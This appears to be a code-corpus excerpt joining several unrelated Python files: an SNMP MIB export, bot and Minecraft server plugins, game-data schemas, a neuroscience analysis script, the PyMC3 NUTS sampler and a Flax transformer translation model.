mibBuilder.exportSymbols("JUNIPER-BFD-MIB", jnxBfdNotifyObjects=jnxBfdNotifyObjects, jnxBfdMib=jnxBfdMib, PYSNMP_MODULE_ID=jnxBfdMib, jnxBfdSessThreshDectTime=jnxBfdSessThreshDectTime, jnxBfdSessIntfName=jnxBfdSessIntfName, jnxBfdSessTxIntervalHigh=jnxBfdSessTxIntervalHigh, jnxBfdSessDetectionTimeHigh=jnxBfdSessDetectionTimeHigh, jnxBfdObjects=jnxBfdObjects, jnxBfdSessTable=jnxBfdSessTable, jnxBfdSessEntry=jnxBfdSessEntry, jnxBfdNotification=jnxBfdNotification, jnxBfdSessCurrTxInterval=jnxBfdSessCurrTxInterval, jnxBfdSessCurrDectTime=jnxBfdSessCurrDectTime, jnxBfdSessifName=jnxBfdSessifName, jnxBfdSessThreshTxInterval=jnxBfdSessThreshTxInterval)
| 112.659091 | 653 | 0.773452 |
795c855d60b77e20c876cacec9a8091a695ddc63 | 258 | py | Python | plugins/giveaways/requirements/__init__.py | Friskytool/command-handler | 2c0c7eecc8afe7898650dfc69d1c8816448c2480 | [
"MIT"
] | null | null | null | plugins/giveaways/requirements/__init__.py | Friskytool/command-handler | 2c0c7eecc8afe7898650dfc69d1c8816448c2480 | [
"MIT"
] | 4 | 2021-12-10T06:18:12.000Z | 2022-03-24T14:43:57.000Z | plugins/giveaways/requirements/__init__.py | Friskytool/command-handler | 2c0c7eecc8afe7898650dfc69d1c8816448c2480 | [
"MIT"
] | null | null | null | from .lottery import Lottery
from .roles import Role, Bypass, Blacklist
from .amari import Amari
from .mee6 import Mee6
from .boost import Boost
def setup(bot):
for req in [Role, Bypass, Blacklist, Amari, Mee6, Boost, Lottery]:
req.inject(bot)
| 23.454545 | 70 | 0.724806 |
795c8565478a287468f8fe19c1c1ccbf9c40fc16 | 11,835 | py | Python | __init__.py | Chainmail-Project/ChainmailEssentials | 4df9725770e72856f39e260f810edac3f179e03d | [
"MIT"
] | null | null | null | __init__.py | Chainmail-Project/ChainmailEssentials | 4df9725770e72856f39e260f810edac3f179e03d | [
"MIT"
] | null | null | null | __init__.py | Chainmail-Project/ChainmailEssentials | 4df9725770e72856f39e260f810edac3f179e03d | [
"MIT"
] | null | null | null | import builtins
import threading
import time
import traceback
from typing import TypeVar, List, Optional, Match
from Chainmail import Wrapper
from Chainmail.Events import CommandSentEvent, PlayerConnectedEvent, Events
from Chainmail.MessageBuilder import MessageBuilder, Colours
from Chainmail.Player import Player
from Chainmail.Plugin import ChainmailPlugin
from plugins.ChainmailRCON import ChainmailRCON, RCONClientHandler
t = TypeVar("t")
class PendingTPA(object):
def __init__(self, creator: Player, recipient: Player):
self.created_at = time.time()
self.creator = creator # type: Player
self.recipient = recipient # type: Player
self.responded = False
self.notify_creation()
def notify_creation(self):
message = MessageBuilder()
message.add_field("You have been sent a teleport request by ", Colours.gold)
message.add_field(f"{self.creator.username}.\n", Colours.blue)
message.add_field("Use ", Colours.gold)
message.add_field("!tpaccept ", Colours.blue)
message.add_field("to accept the request, or ", Colours.gold)
message.add_field("!tpdeny ", Colours.blue)
message.add_field("to decline it.", Colours.gold)
self.recipient.send_message(message)
message = MessageBuilder()
message.add_field("Your request to ", Colours.gold)
message.add_field(f"{self.recipient.username} ", Colours.blue)
message.add_field("has been sent.", Colours.gold)
self.creator.send_message(message)
def do_teleport(self):
message = MessageBuilder()
message.add_field("Teleporting you to ", Colours.gold)
message.add_field(f"{self.recipient.username}.", Colours.blue)
self.creator.send_message(message)
message = MessageBuilder()
message.add_field("You are being teleported to by ", Colours.gold)
message.add_field(f"{self.creator.username}.", Colours.blue)
self.recipient.send_message(message)
self.creator.teleport_to(self.recipient)
def notify_expired(self):
if not self.responded:
message = MessageBuilder()
message.add_field("Your TPA to ", Colours.gold)
message.add_field(f"{self.recipient.username} ", Colours.blue)
message.add_field("has expired.", Colours.gold)
self.creator.send_message(message)
message = MessageBuilder()
message.add_field("Your TPA from ", Colours.gold)
message.add_field(f"{self.creator.username} ", Colours.blue)
message.add_field("has expired.", Colours.gold)
self.recipient.send_message(message)
def notify_denied(self):
message = MessageBuilder()
message.add_field(f"{self.recipient.username} ", Colours.blue)
message.add_field("has declined your teleport request.", Colours.gold)
self.creator.send_message(message)
message = MessageBuilder()
message.add_field("Request denied.", Colours.red)
self.recipient.send_message(message)
@property
def expired(self) -> bool:
return (time.time() - self.created_at) >= 60 or self.responded
class ChainmailEssentials(ChainmailPlugin):
def __init__(self, manifest: dict, wrapper: "Wrapper.Wrapper") -> None:
super().__init__(manifest, wrapper)
self.rcon = getattr(builtins, "RCON") # type: ChainmailRCON
self.needs_update = self.new_version_available
self.pending_tpas = [] # type: List[PendingTPA]
self.eval_usage_message = MessageBuilder()
self.eval_usage_message.add_field("Usage: ", colour=Colours.red, bold=True)
self.eval_usage_message.add_field("!exec <code>", colour=Colours.gold)
self.update_message = MessageBuilder()
self.update_message.add_field("A new version of ", Colours.gold)
self.update_message.add_field("Chainmail Essentials ", Colours.blue)
self.update_message.add_field("is available.", Colours.gold)
self.eval = self.wrapper.CommandRegistry.register_command("!eval", "^!eval (.+)$", "Evaluates Python expressions.", self.command_eval, True)
self.eval_usage = self.wrapper.CommandRegistry.register_command("!eval", "^!eval$", "Displays the usage message.", self.command_eval_usage, True)
self.commands = self.wrapper.CommandRegistry.register_command("!commands", "^!commands$", "Lists commands accessible to a user.", self.command_commands)
self.plugins = self.wrapper.CommandRegistry.register_command("!plugins", "^!plugins$", "Lists all loaded plugins.", self.command_plugins)
self.reload = self.wrapper.CommandRegistry.register_command("!reload", "^!reload$", "Reloads all plugins.", self.command_reload, True)
self.tpa = self.wrapper.CommandRegistry.register_command("!tpa", "^!tpa ([\\w\\d_]+)$", "Requests to teleport to another user.", self.command_tpa)
self.tpaccept = self.wrapper.CommandRegistry.register_command("!tpaccept", "^!tpaccept$", "Accepts a teleport request.", self.command_tpaccept)
self.tpdeny = self.wrapper.CommandRegistry.register_command("!tpdeny", "^!tpdeny$", "Denies a teleport request.", self.command_tpdeny)
self.info = self.wrapper.CommandRegistry.register_command("!info", "^!info$", "Gets various info about the server.", self.command_info, True)
self.rcon.register_command("/commands", "^/commands$", "Lists the commands you have access to.", self.rconcommand_commands)
self.wrapper.EventManager.register_handler(Events.PLAYER_CONNECTED, self.handle_connection)
def remove_expired_tpas_thread(self):
while self.wrapper.wrapper_running and self.enabled:
for tpa in self.pending_tpas:
if tpa.expired:
tpa.notify_expired()
self.pending_tpas.remove(tpa)
time.sleep(5)
def get_tpa(self, creator: Player=None, recipient: Player=None) -> Optional[PendingTPA]:
"""
Gets a pending tpa for a specified creator or recipient
:param creator: The creator of the tpa
:param recipient: The recipient of the tpa
:return: The tpa
"""
if creator is not None:
for tpa in self.pending_tpas:
if tpa.creator == creator:
return tpa
if recipient is not None:
for tpa in self.pending_tpas:
if tpa.recipient == recipient:
return tpa
return None
# noinspection PyMethodMayBeStatic
def command_eval(self, event: CommandSentEvent):
code = event.args[0]
# noinspection PyBroadException
try:
result = str(eval(code))
error = False
except:
result = traceback.format_exc(1)
error = True
builder = MessageBuilder()
colour = Colours.green if not error else Colours.red
builder.add_field("Result: ", colour=Colours.gold)
builder.add_field(result, colour=colour)
event.player.send_message(builder)
def command_eval_usage(self, event: CommandSentEvent):
event.player.send_message(self.eval_usage_message)
def command_commands(self, event: CommandSentEvent):
commands = self.wrapper.CommandRegistry.get_accessible_commands(event.player)
builder = MessageBuilder()
seen_commands = []
for command in commands:
if command.name not in seen_commands:
seen_commands.append(command.name)
builder.add_field(f"{command.name}: ", Colours.red)
suffix = "\n" if command != commands[-1] and command.name != commands[-1].name else ""
builder.add_field(f"{command.description}{suffix}", Colours.gold)
event.player.send_message(builder)
def rconcommand_commands(self, matches: List[Match[str]], client: RCONClientHandler):
components = []
seen = []
for command in self.rcon.commands:
if command["name"] not in seen and (client.authed or not command["requires_auth"]):
seen.append(command["name"])
components.append(f"{command['name']}: {command['description']}")
client.writeline("\n".join(components))
def command_plugins(self, event: CommandSentEvent):
plugins = self.wrapper.PluginManager.get_all_plugins()
builder = MessageBuilder()
for plugin in plugins:
if self.wrapper.PluginManager.get_plugin_loaded(plugin["manifest"]["name"]):
builder.add_field(f"{plugin['manifest']['name']}\n", Colours.blue)
builder.add_field(" Developer: ", Colours.red)
builder.add_field(f"{plugin['manifest']['developer']}\n", Colours.blue)
suffix = "\n" if plugin != plugins[-1] else ""
builder.add_field(" Version: ", Colours.red)
builder.add_field(f"{plugin['manifest']['version']}{suffix}", Colours.blue)
event.player.send_message(builder)
def command_reload(self, event: CommandSentEvent):
builder = MessageBuilder()
builder.add_field("Reloading all plugins...", Colours.blue)
event.player.send_message(builder)
self.wrapper.reload()
builder = MessageBuilder()
builder.add_field("Plugins reloaded.", Colours.green)
event.player.send_message(builder)
def command_tpa(self, event: CommandSentEvent):
recipient = self.wrapper.PlayerManager.get_player(event.args[0])
if recipient is None:
builder = MessageBuilder()
builder.add_field("A player with that username was not found.", Colours.red)
event.player.send_message(builder)
return
if self.get_tpa(creator=event.player) is not None:
builder = MessageBuilder()
builder.add_field("You already have an active outgoing TPA request.", Colours.red)
event.player.send_message(builder)
return
if self.get_tpa(recipient=recipient) is not None:
builder = MessageBuilder()
builder.add_field("The other player already has a pending TPA request.", Colours.red)
event.player.send_message(builder)
return
self.pending_tpas.append(PendingTPA(event.player, recipient))
def command_tpaccept(self, event: CommandSentEvent):
tpa = self.get_tpa(recipient=event.player)
if tpa is None:
builder = MessageBuilder()
builder.add_field("You do not have a pending TPA.", Colours.red)
event.player.send_message(builder)
return
tpa.responded = True
tpa.do_teleport()
def command_tpdeny(self, event: CommandSentEvent):
tpa = self.get_tpa(recipient=event.player)
if tpa is None:
builder = MessageBuilder()
builder.add_field("You do not have a pending TPA.", Colours.red)
event.player.send_message(builder)
return
tpa.responded = True
tpa.notify_denied()
def command_info(self, event: CommandSentEvent):
builder = MessageBuilder()
builder.add_field("Server version: ", Colours.gold)
builder.add_field(f"{self.wrapper.version}\n", Colours.blue)
builder.add_field("OPs: ", Colours.gold)
builder.add_field(f"{len(self.wrapper.ops)}", Colours.blue)
event.player.send_message(builder)
def handle_connection(self, event: PlayerConnectedEvent):
if event.player.is_op and self.needs_update:
event.player.send_message(self.update_message)
def enable(self) -> None:
super().enable()
threading.Thread(target=self.remove_expired_tpas_thread).start()
| 44.829545 | 160 | 0.657203 |
795c857a9bb8183e2032d8e2c033749a7c05e114 | 1,611 | py | Python | common/schemas/ffxiv.py | zhudotexe/FFXIV_PaissaDB | 8ce7edbc0e2b383a201b8789a09bd263eb0713c7 | [
"MIT"
] | 2 | 2021-09-07T00:44:05.000Z | 2022-03-26T17:14:46.000Z | common/schemas/ffxiv.py | zhudotexe/FFXIV_PaissaDB | 8ce7edbc0e2b383a201b8789a09bd263eb0713c7 | [
"MIT"
] | null | null | null | common/schemas/ffxiv.py | zhudotexe/FFXIV_PaissaDB | 8ce7edbc0e2b383a201b8789a09bd263eb0713c7 | [
"MIT"
] | 1 | 2021-09-15T17:45:46.000Z | 2021-09-15T17:45:46.000Z | """
Schemas defined by FFXIV game code.
See https://github.com/zhudotexe/FFXIV_PaissaHouse/tree/main/Structures
"""
import enum
from pydantic import BaseModel, conlist, constr
from common import models
# ---- substructures ----
class HousingFlags(enum.IntFlag):
PlotOwned = 1 << 0
VisitorsAllowed = 1 << 1
HasSearchComment = 1 << 2
HouseBuilt = 1 << 3
OwnedByFC = 1 << 4
class LandIdent(BaseModel):
LandId: int
WardNumber: int
TerritoryTypeId: int
WorldId: int
class HouseInfoEntry(BaseModel):
HousePrice: int
InfoFlags: HousingFlags
HouseAppeals: conlist(int, min_items=3, max_items=3)
EstateOwnerName: constr(max_length=32)
# ---- packets ----
class BaseFFXIVPacket(BaseModel):
event_type: models.EventType
client_timestamp: float
server_timestamp: float
@classmethod
def __get_validators__(cls):
yield cls.return_effect
@classmethod
def return_effect(cls, values): # https://github.com/samuelcolvin/pydantic/issues/619#issuecomment-713508861
try:
etype = values["event_type"]
except KeyError:
raise ValueError("missing 'event_type' key")
try:
return EVENT_TYPES[etype](**values)
except KeyError:
raise ValueError(f"{etype} is not a valid event type")
class HousingWardInfo(BaseFFXIVPacket):
event_type = models.EventType.HOUSING_WARD_INFO
LandIdent: LandIdent
HouseInfoEntries: conlist(HouseInfoEntry, min_items=60, max_items=60)
EVENT_TYPES = {
models.EventType.HOUSING_WARD_INFO.value: HousingWardInfo
}
| 24.044776 | 113 | 0.693358 |
795c85faf50d1ad76996aebbcd983f71a5e378ac | 3,292 | py | Python | analysis_codes_v1/oscillations_run.py | zqwei/LIF_Vis_model | 16f651ac827ba5f0feb40a0e619e600f1251d009 | [
"MIT"
] | null | null | null | analysis_codes_v1/oscillations_run.py | zqwei/LIF_Vis_model | 16f651ac827ba5f0feb40a0e619e600f1251d009 | [
"MIT"
] | null | null | null | analysis_codes_v1/oscillations_run.py | zqwei/LIF_Vis_model | 16f651ac827ba5f0feb40a0e619e600f1251d009 | [
"MIT"
] | null | null | null | import matplotlib
matplotlib.use('Agg')
import oscillations
import pickle
import numpy as np
import matplotlib.pyplot as plt
matplotlib.rcParams.update({'font.size': 20})
bin_start = 500.0
bin_stop = 3000.0
bin_size = 1.0
electrode_pos = [0.0, 0.0, 0.0]
r_cutoff = 10.0 # Distance, in um, below which the weights for 1/r contributions are set to 0.
N_trials = 10
# Decide which systems we are doing analysis for.
cell_db_path = '/allen/aibs/mat/antona/network/14-simulations/9-network/build/'
# Decide which systems we are doing analysis for.
sys_dict = {}
sys_dict['ll1'] = {'cells_file': cell_db_path+'ll1.csv',
'f_1': '../simulation_ll1/output_ll1_',
'f_2': '_sdlif_z101/spk.dat',
'f_out_prefix': 'oscillations/ll1_spectrum',
'grating_ids': [range(7, 240, 30), range(8, 240, 30), range(9, 240, 30)],
'marker': '--'}
sys_dict['ll2'] = {'cells_file': cell_db_path+'ll2.csv',
'f_1': '../simulation_ll2/output_ll2_',
'f_2': '_sdlif_z101/spk.dat',
'f_out_prefix': 'oscillations/ll2_spectrum',
'grating_ids': [range(7, 240, 30), range(8, 240, 30), range(9, 240, 30)],
'marker': '-'}
sys_dict['ll3'] = {'cells_file': cell_db_path+'ll3.csv',
'f_1': '../simulation_ll3/output_ll3_',
'f_2': '_sdlif_z101/spk.dat',
'f_out_prefix': 'oscillations/ll3_spectrum',
'grating_ids': [range(7, 240, 30), range(8, 240, 30), range(9, 240, 30)],
'marker': ':'}
# Process the data and obtain spectra.
for sys_name in sys_dict.keys():
for gratings_list in sys_dict[sys_name]['grating_ids']:
f_spk_list = []
cells_file_list = []
for grating_id in gratings_list:
for trial in xrange(N_trials):
f_spk_list.append('%sg%d_%d%s' % (sys_dict[sys_name]['f_1'], grating_id, trial, sys_dict[sys_name]['f_2']))
cells_file_list.append(sys_dict[sys_name]['cells_file'])
tmp = oscillations.av_r_weighted_mu_activity(f_spk_list, cells_file_list, electrode_pos, r_cutoff, bin_start, bin_stop, bin_size)
f = open('%s_%d.pkl' % (sys_dict[sys_name]['f_out_prefix'], gratings_list[0]), 'w')
pickle.dump(tmp, f)
f.close()
# Plot the results.
for sys_name in sys_dict.keys():
grating_start = 8
f_name = '%s_%d.pkl' % (sys_dict[sys_name]['f_out_prefix'], grating_start)
f = open(f_name, 'r')
freq_fft_abs, av_fft_abs, std_fft_abs = pickle.load(f)
f.close()
ind = np.intersect1d(np.where(freq_fft_abs > 0.0), np.where(freq_fft_abs < 100.0))
#plt.errorbar(freq_fft_abs[ind], av_fft_abs[ind], yerr=std_fft_abs[ind], marker=sys_dict[sys_name]['marker'], ms=10, markevery=5, color='k', linewidth=2, capsize=0, ecolor='lightgray', elinewidth=5, label=f_name)
plt.errorbar(freq_fft_abs[ind], 1000.0*av_fft_abs[ind], yerr=1000.0*std_fft_abs[ind], ls=sys_dict[sys_name]['marker'], color='k', linewidth=2, capsize=0, ecolor='lightgray', elinewidth=5, label=f_name)
plt.legend()
plt.ylabel('Power (arb. u.)')
plt.xlabel('Frequency (Hz)')
plt.show()
plt.savefig('oscillations/oscillations_TF4Hz.png')
| 46.366197 | 216 | 0.626367 |
795c870bf304e00bfcecd9e8b781a3472967b4f2 | 6,475 | py | Python | pymc3/step_methods/nuts.py | MichielCottaar/pymc3 | f37198653e7d09881e7bc411cbd10fffbab442c2 | [
"Apache-2.0"
] | null | null | null | pymc3/step_methods/nuts.py | MichielCottaar/pymc3 | f37198653e7d09881e7bc411cbd10fffbab442c2 | [
"Apache-2.0"
] | null | null | null | pymc3/step_methods/nuts.py | MichielCottaar/pymc3 | f37198653e7d09881e7bc411cbd10fffbab442c2 | [
"Apache-2.0"
] | null | null | null | from .quadpotential import *
from .arraystep import *
from ..core import *
from numpy import exp, log
from numpy.random import uniform
from .hmc import leapfrog, Hamiltonian, bern, energy
from ..distributions import *
from ..tuning import guess_scaling
import theano
from ..theanof import make_shared_replacements, join_nonshared_inputs, CallableTensor
import theano.tensor
__all__ = ['NUTS']
class NUTS(ArrayStepShared):
"""
Automatically tunes step size and adjust number of steps for good performance.
Implements "Algorithm 6: Efficient No-U-Turn Sampler with Dual Averaging" in:
Hoffman, Matthew D., & Gelman, Andrew. (2011).
The No-U-Turn Sampler: Adaptively Setting Path Lengths in Hamiltonian Monte Carlo.
"""
default_blocked = True
def __init__(self, vars=None, scaling=None, step_scale=0.25, is_cov=False, state=None,
Emax=1000,
target_accept=0.8,
gamma=0.05,
k=0.75,
t0=10,
model=None,
profile=False,**kwargs):
"""
Parameters
----------
vars : list of Theano variables, default continuous vars
scaling : array_like, ndim = {1,2} or point
Scaling for momentum distribution. 1d arrays interpreted matrix diagonal.
step_scale : float, default=.25
Size of steps to take, automatically scaled down by 1/n**(1/4)
is_cov : bool, default=False
Treat C as a covariance matrix/vector if True, else treat it as a precision matrix/vector
state
state to start from
Emax : float, default 1000
maximum energy
target_accept : float (0,1) default .65
target for avg accept probability between final branch and initial position
gamma : float, default .05
k : float (.5,1) default .75
scaling of speed of adaptation
t0 : int, default 10
slows inital adapatation
model : Model
profile : bool or ProfileStats
sets the functions to be profiled
"""
model = modelcontext(model)
if vars is None:
vars = model.cont_vars
vars = inputvars(vars)
if scaling is None:
scaling = model.test_point
if isinstance(scaling, dict):
scaling = guess_scaling(Point(scaling, model=model), model=model, vars = vars)
n = scaling.shape[0]
self.step_size = step_scale / n**(1/4.)
self.potential = quad_potential(scaling, is_cov, as_cov=False)
if state is None:
state = SamplerHist()
self.state = state
self.Emax = Emax
self.target_accept = target_accept
self.gamma = gamma
self.t0 = t0
self.k = k
self.Hbar = 0
self.u = log(self.step_size*10)
self.m = 1
shared = make_shared_replacements(vars, model)
self.leapfrog1_dE = leapfrog1_dE(model.logpt, vars, shared, self.potential, profile=profile)
super(NUTS, self).__init__(vars, shared, **kwargs)
def astep(self, q0):
H = self.leapfrog1_dE #Hamiltonian(self.logp, self.dlogp, self.potential)
Emax = self.Emax
e = self.step_size
p0 = self.potential.random()
u = uniform()
q = qn = qp = q0
p = pn = pp = p0
n, s, j = 1, 1, 0
while s == 1:
v = bern(.5) * 2 - 1
if v == -1:
qn, pn, _, _, q1, n1, s1, a, na = buildtree(H, qn, pn, u, v, j, e, Emax, q0, p0)
else:
_, _, qp, pp, q1, n1, s1, a, na = buildtree(H, qp, pp, u, v, j, e, Emax, q0, p0)
if s1 == 1 and bern(min(1, n1*1./n)):
q = q1
n = n + n1
span = qp - qn
s = s1 * (span.dot(pn) >= 0) * (span.dot(pp) >= 0)
j = j + 1
p = -p
w = 1./(self.m+self.t0)
self.Hbar = (1 - w) * self.Hbar + w*(self.target_accept - a*1./na)
self.step_size = exp(self.u - (self.m**.5/self.gamma)*self.Hbar)
self.m += 1
return q
@staticmethod
def competence(var):
if var.dtype in continuous_types:
return Competence.ideal
return Competence.incompatible
def buildtree(H, q, p, u, v, j, e, Emax, q0, p0):
if j == 0:
leapfrog1_dE = H
q1, p1, dE = leapfrog1_dE(q, p, np.array(v*e))
n1 = int(log(u) + dE <= 0)
s1 = int(log(u) + dE < Emax)
return q1, p1, q1, p1, q1, n1, s1, min(1, exp(-dE)), 1
else:
qn, pn, qp, pp, q1, n1, s1, a1, na1 = buildtree(H, q, p, u, v, j - 1, e, Emax, q0, p0)
if s1 == 1:
if v == -1:
qn, pn, _, _, q11, n11, s11, a11, na11 = buildtree(H, qn, pn, u, v, j - 1, e, Emax, q0, p0)
else:
_, _, qp, pp, q11, n11, s11, a11, na11 = buildtree(H, qp, pp, u, v, j - 1, e, Emax, q0, p0)
if bern(n11*1./(max(n1 + n11, 1))):
q1 = q11
a1 = a1 + a11
na1 = na1 + na11
span = qp - qn
s1 = s11 * (span.dot(pn) >= 0) * (span.dot(pp) >= 0)
n1 = n1 + n11
return qn, pn, qp, pp, q1, n1, s1, a1, na1
return
def leapfrog1_dE(logp, vars, shared, pot, profile):
"""Computes a theano function that computes one leapfrog step and the energy difference between the beginning and end of the trajectory.
Parameters
----------
logp : TensorVariable
vars : list of tensor variables
shared : list of shared variables not to compute leapfrog over
pot : quadpotential
porifle : Boolean
Returns
-------
theano function which returns
q_new, p_new, delta_E
"""
dlogp = gradient(logp, vars)
(logp, dlogp), q0 = join_nonshared_inputs([logp, dlogp], vars, shared)
logp = CallableTensor(logp)
dlogp = CallableTensor(dlogp)
H = Hamiltonian(logp, dlogp, pot)
p0 = theano.tensor.dvector('p0')
p0.tag.test_value = q0.tag.test_value
e = theano.tensor.dscalar('e')
e.tag.test_value = 1
q1, p1 = leapfrog(H, q0, p0, 1, e)
E = energy(H, q1, p1)
E0 = energy(H, q0, p0)
dE = E - E0
f = theano.function([q0, p0, e], [q1, p1, dE], profile=profile)
f.trust_input = True
return f
| 30.687204 | 140 | 0.545483 |
795c870fb161d0514bee3682d79d1a5dea9371fb | 17,381 | py | Python | algorithmic_efficiency/workloads/wmt/wmt_jax/models.py | Bezenek/algorithmic-efficiency | 84aac20796d685f810960dfa4fe5524798db876e | [
"Apache-2.0"
] | 1 | 2022-01-29T07:51:55.000Z | 2022-01-29T07:51:55.000Z | algorithmic_efficiency/workloads/wmt/wmt_jax/models.py | Bezenek/algorithmic-efficiency | 84aac20796d685f810960dfa4fe5524798db876e | [
"Apache-2.0"
] | null | null | null | algorithmic_efficiency/workloads/wmt/wmt_jax/models.py | Bezenek/algorithmic-efficiency | 84aac20796d685f810960dfa4fe5524798db876e | [
"Apache-2.0"
] | 1 | 2022-01-20T17:43:29.000Z | 2022-01-20T17:43:29.000Z | """Transformer-based machine translation model."""
from typing import Any, Callable, Optional
from flax import linen as nn
from flax import struct
from jax import lax
import jax.numpy as jnp
import numpy as np
@struct.dataclass
class TransformerConfig:
"""Global hyperparameters used to minimize obnoxious kwarg plumbing."""
vocab_size: int = 32000
output_vocab_size: int = 32000
share_embeddings: bool = True
logits_via_embedding: bool = True
dtype: Any = jnp.float32
emb_dim: int = 1024
num_heads: int = 16
num_layers: int = 6
qkv_dim: int = 1024
mlp_dim: int = 4096
max_len: int = 256
dropout_rate: float = 0.1
attention_dropout_rate: float = 0.1
deterministic: bool = False
decode: bool = False
kernel_init: Callable = nn.initializers.xavier_uniform()
bias_init: Callable = nn.initializers.normal(stddev=1e-6)
posemb_init: Optional[Callable] = None
def shift_right(x, axis=1):
"""Shift the input to the right by padding on axis 1."""
pad_widths = [(0, 0)] * len(x.shape)
pad_widths[axis] = (1, 0)
padded = jnp.pad(
x, pad_widths, mode='constant', constant_values=x.dtype.type(0))
return padded[:, :-1]
def sinusoidal_init(max_len=2048, min_scale=1.0, max_scale=10000.0):
"""1D Sinusoidal Position Embedding Initializer.
Args:
max_len: maximum possible length for the input.
min_scale: float: minimum frequency-scale in sine grating.
max_scale: float: maximum frequency-scale in sine grating.
Returns:
output: init function returning `(1, max_len, d_feature)`
"""
def init(key, shape, dtype=np.float32):
"""Sinusoidal init."""
del key, dtype
d_feature = shape[-1]
pe = np.zeros((max_len, d_feature), dtype=np.float32)
position = np.arange(0, max_len)[:, np.newaxis]
scale_factor = -np.log(max_scale / min_scale) / (d_feature // 2 - 1)
div_term = min_scale * np.exp(np.arange(0, d_feature // 2) * scale_factor)
pe[:, :d_feature // 2] = np.sin(position * div_term)
pe[:, d_feature // 2:2 * (d_feature // 2)] = np.cos(position * div_term)
pe = pe[np.newaxis, :, :] # [1, max_len, d_feature]
return jnp.array(pe)
return init
class AddPositionEmbs(nn.Module):
"""Adds (optionally learned) positional embeddings to the inputs.
Attributes:
config: TransformerConfig dataclass containing hyperparameters.
decode: whether to run in single-position autoregressive mode.
"""
config: TransformerConfig
decode: bool = False
@nn.compact
def __call__(self, inputs, inputs_positions=None):
"""Applies AddPositionEmbs module.
By default this layer uses a fixed sinusoidal embedding table. If a
learned position embedding is desired, pass an initializer to
posemb_init in the configuration.
Args:
inputs: input data.
inputs_positions: input position indices for packed sequences.
Returns:
output: `(bs, timesteps, in_dim)`
"""
cfg = self.config
# inputs.shape is (batch_size, seq_len, emb_dim)
assert inputs.ndim == 3, ('Number of dimensions should be 3,'
' but it is: %d' % inputs.ndim)
length = inputs.shape[1]
pos_emb_shape = (1, cfg.max_len, inputs.shape[-1])
if cfg.posemb_init is None:
# Use a fixed (non-learned) sinusoidal position embedding.
pos_embedding = sinusoidal_init(max_len=cfg.max_len)(None, pos_emb_shape,
None)
else:
pos_embedding = self.param('pos_embedding', cfg.posemb_init,
pos_emb_shape)
pe = pos_embedding[:, :length, :]
# We use a cache position index for tracking decoding position.
if self.decode:
is_initialized = self.has_variable('cache', 'cache_index')
cache_index = self.variable('cache', 'cache_index',
lambda: jnp.array(0, dtype=jnp.uint32))
if is_initialized:
i = cache_index.value
cache_index.value = i + 1
_, _, df = pos_embedding.shape
pe = lax.dynamic_slice(pos_embedding, jnp.array((0, i, 0)), (1, 1, df))
if inputs_positions is None:
# normal unpacked case:
return inputs + pe
else:
# for packed data we need to use known position indices:
return inputs + jnp.take(pe[0], inputs_positions, axis=0)
class MlpBlock(nn.Module):
"""Transformer MLP / feed-forward block.
Attributes:
config: TransformerConfig dataclass containing hyperparameters.
out_dim: optionally specify out dimension.
"""
config: TransformerConfig
out_dim: Optional[int] = None
@nn.compact
def __call__(self, inputs):
"""Applies Transformer MlpBlock module."""
cfg = self.config
actual_out_dim = (
inputs.shape[-1] if self.out_dim is None else self.out_dim)
x = nn.Dense(
cfg.mlp_dim,
dtype=cfg.dtype,
kernel_init=cfg.kernel_init,
bias_init=cfg.bias_init)(
inputs)
x = nn.relu(x)
x = nn.Dropout(rate=cfg.dropout_rate)(x, deterministic=cfg.deterministic)
output = nn.Dense(
actual_out_dim,
dtype=cfg.dtype,
kernel_init=cfg.kernel_init,
bias_init=cfg.bias_init)(
x)
output = nn.Dropout(rate=cfg.dropout_rate)(
output, deterministic=cfg.deterministic)
return output
class Encoder1DBlock(nn.Module):
"""Transformer encoder layer.
Attributes:
config: TransformerConfig dataclass containing hyperparameters.
"""
config: TransformerConfig
@nn.compact
def __call__(self, inputs, encoder_mask=None):
"""Applies Encoder1DBlock module.
Args:
inputs: input data.
encoder_mask: encoder self-attention mask.
Returns:
output after transformer encoder block.
"""
cfg = self.config
# Attention block.
assert inputs.ndim == 3
x = nn.LayerNorm(dtype=cfg.dtype)(inputs)
x = nn.SelfAttention(
num_heads=cfg.num_heads,
dtype=cfg.dtype,
qkv_features=cfg.qkv_dim,
kernel_init=cfg.kernel_init,
bias_init=cfg.bias_init,
use_bias=False,
broadcast_dropout=False,
dropout_rate=cfg.attention_dropout_rate,
deterministic=cfg.deterministic)(x, encoder_mask)
x = nn.Dropout(rate=cfg.dropout_rate)(x, deterministic=cfg.deterministic)
x = x + inputs
# MLP block.
y = nn.LayerNorm(dtype=cfg.dtype)(x)
y = MlpBlock(config=cfg)(y)
return x + y
class EncoderDecoder1DBlock(nn.Module):
"""Transformer encoder-decoder layer.
Attributes:
config: TransformerConfig dataclass containing hyperparameters.
"""
config: TransformerConfig
@nn.compact
def __call__(self,
targets,
encoded,
decoder_mask=None,
encoder_decoder_mask=None):
"""Applies EncoderDecoder1DBlock module.
Args:
targets: input data for decoder
encoded: input data from encoder
decoder_mask: decoder self-attention mask.
encoder_decoder_mask: encoder-decoder attention mask.
Returns:
output after transformer encoder-decoder block.
"""
cfg = self.config
# Decoder block.
assert targets.ndim == 3
x = nn.LayerNorm(dtype=cfg.dtype)(targets)
x = nn.SelfAttention(
num_heads=cfg.num_heads,
dtype=cfg.dtype,
qkv_features=cfg.qkv_dim,
kernel_init=cfg.kernel_init,
bias_init=cfg.bias_init,
use_bias=False,
broadcast_dropout=False,
dropout_rate=cfg.attention_dropout_rate,
deterministic=cfg.deterministic,
decode=cfg.decode)(x, decoder_mask)
x = nn.Dropout(rate=cfg.dropout_rate)(x, deterministic=cfg.deterministic)
x = x + targets
# Encoder-Decoder block.
y = nn.LayerNorm(dtype=cfg.dtype)(x)
y = nn.MultiHeadDotProductAttention(
num_heads=cfg.num_heads,
dtype=cfg.dtype,
qkv_features=cfg.qkv_dim,
kernel_init=cfg.kernel_init,
bias_init=cfg.bias_init,
use_bias=False,
broadcast_dropout=False,
dropout_rate=cfg.attention_dropout_rate,
deterministic=cfg.deterministic)(y, encoded, encoder_decoder_mask)
y = nn.Dropout(rate=cfg.dropout_rate)(y, deterministic=cfg.deterministic)
y = y + x
# MLP block.
z = nn.LayerNorm(dtype=cfg.dtype)(y)
z = MlpBlock(config=cfg)(z)
return y + z
class Encoder(nn.Module):
"""Transformer Model Encoder for sequence to sequence translation.
Attributes:
config: TransformerConfig dataclass containing hyperparameters.
shared_embedding: a shared embedding layer to use.
"""
config: TransformerConfig
shared_embedding: Any = None
@nn.compact
